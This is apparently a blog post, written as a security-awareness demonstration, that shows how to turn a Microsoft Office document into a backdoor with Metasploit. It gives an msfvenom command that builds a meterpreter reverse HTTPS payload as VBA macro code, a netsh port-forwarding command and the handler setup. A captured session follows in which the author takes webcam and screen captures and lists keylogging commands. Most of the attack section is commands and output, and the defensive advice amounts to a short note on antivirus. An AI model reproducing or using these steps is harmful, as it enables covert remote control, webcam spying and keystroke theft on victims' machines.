Remote access by creating backdoored office documents

Many treat security as this thing that is far from them and can’t happen to them in part because they can’t see it but also because many wonder why they would even be targeted.

virus
From http://www.clipartkid.com/images/744/giving-computer-virus-clipart-giving-computer-virus-clip-art-GFNgIY-clipart.gif

The demonstration below isn’t meant to facilitate illegal behavior but rather to show the ease with which somethings can be done and hence promote awareness and better online patters. This involves zero coding and zero scripting but more detailed reading and afew existing tools, ya it is that easy manage your behavior when it comes to opening attachments and downloading documents from the internet especially if it shows it asks to open a Macro.

Mitigation, running an antivirus e.g. Defender, AVG, AVAST e.t.c. were able to detect the malware ridden files before i could even run them, this further states the importance of an antivirus but this is for this set of modules the same framework can have better antivirus avoidance mechanisms in the future as it evolves, when carrying this out i noticed that the antiviruses that were running tagged these to existing malware / Trojan signatures this simply means that such has been abused before but it also means attackers simply move to simpler tools rather than scenarios where you picture them typing code.

The demonstration shows how to access one’s system i.e files, webcam, microphone e.t.c by infecting Microsoft Office files. To perform this demonstration a tool / framework called metersploit is used, it’s primary purpose of this framework is for the security community during warranted security penetration and exploitation tests but some people do abuse the same, it is built on many CVEs (Common Vulnerabilty and Exposures) database entries, this means each time you hear a bug somewhere in a particular bit of software there is a chunk that bug can be moved to such frameworks and used either for good or for bad.

This demonstration was carried out using my exploit server in a virtual machine on it’s virtual private LAN, this means i had to find a way of forwarding traffic to the main computer to the virtual machine, this is an important step because your accessed machine can be used to forward traffic to a remote attacker without your knowledge in the same way.

My computer machine on the general LAN was running Windows 10 and the internal machine running the latest Kali Linux Security distro current as at 31st Dec 2016.

Using powershell (Microsoft Windows Vista and above), i excuted the following command on the general LAN machine where 192.168.10.2 was my general LAN and 192.168.5.2 was an internal virtual machine on my computer not accessible on the general LAN, this tells it to forward traffic to it on port 443 to my virtual machine in it’s private LAN.

>netsh interface portproxy add v4tov4 listenaddress=192.168.10.2 listenport=443 connectaddress=192.168.5.2 connectport=443

I used MFSVenom to create a payload that will automatically initiate a connection back to my attacking server from the infected machine, i like https moduels because the destination port (443) is most likely open for outbound connections on remote computers and it is also not suspicious.

I had initally opted “windows/meterpreter/reverse_https”, then i switched and opted for “windows/x64/meterpreter_reverse_https” since i was on my own LAN, the difference is actually quite big so if you have time read the article difference between staged and stageless payloads at https://community.rapid7.com/community/metasploit/blog/2015/03/25/stageless-meterpreter-payloads, the summary is that reverse_https is very small and carries little code and has to download most of the remaining payload on connection from the attacking server while meterpreter_reverse_https contains alot more code and hence doesn’t download bigger chunks from the attacking server making it a better standalone since it has more functionality, the difference was 20KB for reverse_https vs meterpreter_reverse_https at 4.6MB.

root@test1:~# msfvenom -a x64 --platform windows -p windows/x64/meterpreter_reverse_https LHOST=192.168.10.2 LPORT=443 -e x86/shikata_ga_nai -f vba-exe > word.txt
 Found 1 compatible encoders
 Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
 x86/shikata_ga_nai succeeded with size 1190497 (iteration=0)
 x86/shikata_ga_nai chosen with final size 1190497
 Payload size: 1190497 bytes
 Final size of vba-exe file: 4791212 bytes
 root@test1:~#

The result had two portions, the Macro to paste in the visualbasic editor in Office (enable developer tools) and the other (Data) added to the bottom / included in the word document i wanted to mail.
 '**************************************************************
 '*
 '* This code is now split into two pieces:
 '* 1. The Macro. This must be copied into the Office document
 '* macro editor. This macro will run on startup.
 '*
 '* 2. The Data. The hex dump at the end of this output must be
 '* appended to the end of the document contents.
 '*
 '**************************************************************
 '*
 '* MACRO CODE
 '*
 '**************************************************************

— On the server side, start the multi/handler and set the payload to equate the exploit you created with msfvenom to kickoff the listener

msf > use exploit/multi/handler
 msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_https
 PAYLOAD => windows/meterpreter/reverse_https
 msf exploit(handler) > set LHOST 0.0.0.0
 LHOST => 0.0.0.0
 msf exploit(handler) > set LPORT 443
 LPORT => 443
 msf exploit(handler) > show options

Module options (exploit/multi/handler):

Name Current Setting Required Description
 ---- --------------- -------- -----------
 Payload options (windows/meterpreter/reverse_https):

Name Current Setting Required Description
 ---- --------------- -------- -----------
 EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
 LHOST 0.0.0.0 yes The local listener hostname
 LPORT 443 yes The local listener port
 LURI no The HTTP Path
 Exploit target:

Id Name
 -- ----
 0 Wildcard Target
 msf exploit(handler) > exploit

[*] Started HTTPS reverse handler on https://0.0.0.0:443
 [*] Starting the payload handler...

The moment the receiver gets the document and opens it, it is harmless but the moment they click on enable Macros then we see a session initiated from their computer to our exploit server, not that the IP shown is the IP of the port forwarding host and not the remote machine

securitywarning

[*] https://0.0.0.0:443 handling request from 192.168.10.2; (UUID: ixboais5) Staging Native payload...
 [*] Meterpreter session 1 opened (192.168.5.2:443 -> 192.168.10.2:62907) at 2016-12-26 12:43:30 +0300

meterpreter >
 meterpreter >
 meterpreter > sysinfo
 Computer : mainmachine
 OS : Windows 10 (Build 14393).
 Architecture : x64 (Current Process is WOW64)
 System Language : en_US
 Domain : WORKGROUP
 Logged On Users : 2
 Meterpreter : x86/win32
 meterpreter >
 meterpreter >
 mmeterpreter> webcam_snap

[*] Starting...
 [+]Got frame
 [*]Stopped
 Webcam shot saved to: /root/llpNhVPk.jpeg

mmeterpreter> screenshot
 Screenshot saved to: /root/QejAYaQS.jpeg
 mmeterpreter>

some other commands are;

keyscan_dump Dump the keystroke buffer
 keyscan_start Start capturing keystrokes
 keyscan_stop Stop capturing keystrokes

And many more including port forwarding.

Advertisements

One thought on “Remote access by creating backdoored office documents

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s